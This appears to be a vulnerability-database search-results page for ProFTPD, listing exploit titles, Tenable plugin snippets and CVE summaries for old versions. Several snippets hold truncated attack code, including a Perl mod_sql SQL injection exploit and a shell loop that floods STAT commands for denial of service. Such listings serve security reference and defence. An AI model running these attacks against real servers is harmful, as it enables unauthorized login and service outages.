1564 matches found
ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
Exploit for linux platform in category remote exploits ======================================================= ProFTPD 1.2.9RC1 modsql Remote SQL Injection Exploit ======================================================= !/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine -...
ProFTPd 1.2.9 RC1 - mod_sql SQL Injection
ProFTPd 1.2.9 RC1 - modsql SQL Injection !/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine - 2003 use IO::Socket; if@ARGC 1=Alternate query\n\n"; exit0; ; $server = $ARGV0; $query = $ARGV1; $remote = IO::Socket::INET-newProto="tcp",PeerAddr=$server,PeerPort="21",Reuse=1 ...
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection
!/usr/bin/perl ProFTPD 1.2.9 rc1 modsql SQL Injection remote Exploit Spaine - 2003 use IO::Socket; if@ARGC 1=Alternate query\n\n"; exit0; ; $server = $ARGV0; $query = $ARGV1; $remote = IO::Socket::INET-newProto="tcp",PeerAddr=$server,PeerPort="21",Reuse=1 or die "Can't connect. \n"; ifdefined$lin...
PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
The remote FTP server is vulnerable to a SQL injection when it processes the USER command. An attacker may exploit this flaw to log into the remote host as any user. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid11768; scriptversion"1.21"; scriptcvsdate"Date:...
ProFTPD on Debian Linux postinst Installation Privilege Escalation
The following problems have been reported for the version of proftpd in Debian 2.2 potato: 1. There is a configuration error in the postinst script, when the user enters 'yes', when asked if anonymous access should be enabled. The postinst script wrongly leaves the 'run as uid/gid root'...
ProFTPD 1.2.0rc2 Malformed cwd Command Format String
The remote ProFTPd server is as old or older than 1.2.0rc2 There is a very hard to exploit format string vulnerability in this version that could allow an attacker to execute arbitrary code on this host. The vulnerability is believed to be nearly impossible to exploit though. C Tenable Network...
proftpd <=1.2.7rc3 DoS
Hello, proftpd is vulnerable to denial of service similar to the list /..//..//../. !/bin/sh proftpd =1.2.7rc3 DoS - Requires anonymous/ftp login at least might work against many other FTP daemons consumes nearly all memory and alot of CPU tested against slackware 8.1 - proftpd 1.2.4 and 1.2.7rc3...
prodos.sh
Hello, proftpd is vulnerable to denial of service similar to the list /..//..//../. !/bin/sh proftpd do this some more to make sure the system eventually dies cnt=25 while $cnt -gt 0 ; do ftp -n EOF& o $1 quote user $2 quote pass $3 quote stat /////// quit EOF let cnt=cnt-1 done sleep 2 killall -...
ProFTPd 1.2.x - 'STAT' Denial of Service
source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will result in a denial of service condition...
ProFTPd 1.2.x - STAT Denial of Service
ProFTPd 1.2.x - STAT Denial of Service source: https://www.securityfocus.com/bid/6341/info A denial of service vulnerability has been reported for ProFTPD. It is possible to cause ProFTPD from responding to legitimate requests for service by issuing specially crafted STAT commands. This will resu...
CVE-2001-1500
ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged...
CVE-2001-1501
The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service CPU and memory consumption via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple 1 "/..", 2 "/.", or 3...
CVE-2001-0136
Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed...
CVE-2001-0456
postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended...
CVE-2001-0456
Summary: CVE-2001-0456 affects ProFTPD in Debian 2.2 where the postinst script fails to properly adjust the “run as uid/gid root” setting when anonymous access is enabled, causing the server to run with elevated privileges. What’s affected: proftpd on Debian 2.2 (potato); issue in post-install co...
CVE-2001-0136
ProFTPD 1.2.0rc2 is affected by a memory leak that can be exploited to cause DoS via a sequence of USER commands and, if the server is installed with a writable scoreboard, possibly SIZE commands. Mandrake advisory notes the USER and SIZE leaks (SIZE only when scoreboard is writable) and mentions...
CVE-1999-1475
ProFTPd 1.2 compiled with the modsqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command...
CVE-1999-1475
CVE-1999-1475 covers ProFTPd 1.2 compiled with the mod_sqlpw module, where passwords are recorded in the wtmp log file. This allows a local user to read passwords (e.g., via the last command) and potentially obtain privileges. Root cause: unintended password exposure via wtmp logging. Exploitatio...
CVE-2001-0456
postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended...
CVE-2001-0318
Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory cwd...